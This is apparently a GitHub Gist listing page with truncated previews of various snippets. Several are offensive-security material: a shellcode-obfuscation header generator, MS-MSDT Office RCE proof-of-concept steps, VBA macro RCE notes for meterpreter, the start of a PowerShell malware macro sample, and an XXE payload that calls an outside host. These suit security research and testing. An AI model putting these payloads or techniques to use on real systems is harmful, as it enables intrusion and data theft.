Skip to content

Instantly share code, notes, and snippets.

View galaris's full-sized avatar
:shipit:
Y29udGFjdEBkb21pbmlrYW50YWwubWU=

Dominik Antal galaris

:shipit:
Y29udGFjdEBkb21pbmlrYW50YWwubWU=
View GitHub Profile
"""
Transform a binary file into a C header file.
The binary file is splitted into 16 char strings and rebuild at execution time.
The function buildsc() must be called in your main to rebuild the binary file into the sc C variable.
The length is set in the sc_length variable.
Be carefull, try to avoid compiler code optimization as it will remove all these modifications in the final binary.
"""
@tothi
tothi / mitmproxy-jwt-refresh-addon.py
Created August 28, 2022 20:52
mitmproxy addon for handling oauth access and refresh tokens automatically
# run: mitmproxy -k -p 8090 -s mitmproxy-jwt-refresh-addon.py
# set burp upstream proxy to localhost:8090
#
# use case:
# - application authorization is implemented by OAuth 2.0
# - testing is performed using Burp as primary and mitmproxy as upstream proxy
# - mitmproxy takes care of the Authorization tokens using this addon
# - user gets an access_token and a refresh_token during the 1st login (e.g. password login)
# - mitmproxy addon caches access_token and refresh_token
# - mitmproxy addon adds Authorization: Bearer [access_token from cache] header for every request
@tothi
tothi / ms-msdt.MD
Last active April 18, 2024 02:22
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@mgeeky
mgeeky / Various-Macro-Based-RCEs.md
Last active January 14, 2024 16:43
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

  1. Page substiution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload
anonymous
anonymous / gist:d0da355e5c21a122866808d37234cd5d
Created October 23, 2016 00:12
PowerShell malware [posted by @JohnLaTwC]
//sample: 1554e74b935a61d446cb634f80d7d1e200e864bc
//posted by @JohnLaTwC
// Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html
----------------------------------------------- macro ----------------------------------
Private Sub Workbook_Open()
Call doom_Init
Call doom_ShowHideSheets
End Sub
class AccountObjectSetCheats
{
bool AutoBattle = false;
AccountobjectSetCheats Type;
int8 SlotLockCheat = 0;
};
class AccountObjectGetProfile
{
std::string Filename;
@lolzballs
lolzballs / HelloWorld.java
Created March 22, 2015 00:21
Hello World Enterprise Edition
import java.io.FileDescriptor;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.io.PrintStream;
public class HelloWorld{
private static HelloWorld instance;
public static void main(String[] args){
instantiateHelloWorldMainClassAndRun();
@Marko-M
Marko-M / magento2-performance-toolkit.sh
Last active March 28, 2023 17:27
Magento2 performance toolkit
#!/bin/bash
# Generate sample data and trigger Magento2 performance toolkit jMeter test plan.
HOST="magento2.loc"
BASE_PATH="/"
USERS=100
RAMP_PERIOD=300
LOOPS=1
ADMIN_USER="magento2"
ADMIN_PASSWORD="magento2"
@rmondello
rmondello / gist:b933231b1fcc83a7db0b
Last active April 5, 2024 07:10
Exporting (iCloud) Keychain and Safari credentials to a CSV file

Exporting (iCloud) Keychain and Safari credentials to a CSV file

Update (October 2021)

Exporting password + one-time code data from iCloud Keychain is now officially supported in macOS Monterey and Safari 15 (for Monterey, Big Sur, and Catalina). You can access it in the Password Manager’s “gear” icon (System Preferences > Passwords on Monterey, and Safari > Passwords everywhere else), or via the File > Export > Passwords... menu item). You shouldn't need to hack up your own exporter anymore.

Original, Obsolete Content (2014)

After my dad died, I wanted to be able to have access any of his online accounts going forward. My dad was a Safari user and used iCloud Keychain to sync his credentials across his devices. I don’t want to have to keep an OS X user account around just to access his accounts, so I wanted to export his credentials to a portable file.

@staaldraad
staaldraad / XXE_payloads
Last active June 15, 2024 16:32
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>